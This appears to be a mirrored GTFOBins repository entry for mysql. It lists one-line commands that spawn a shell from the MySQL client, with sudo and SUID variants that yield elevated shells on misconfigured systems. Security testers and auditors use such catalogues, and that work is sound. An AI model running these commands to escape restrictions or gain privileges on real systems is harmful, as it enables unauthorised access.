1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io synced 2025-01-22 11:22:47 +01:00
GTFOBins.github.io/_gtfobins/mysql.md
2018-08-31 11:09:19 +02:00

11 lines
236 B
Markdown

---
description: A valid MySQL server must be available.
functions:
execute-interactive:
- code: mysql -e '\! /bin/sh'
sudo-enabled:
- code: sudo mysql -e '\! /bin/sh'
suid-limited:
- code: ./mysql -e '\! /bin/sh'
---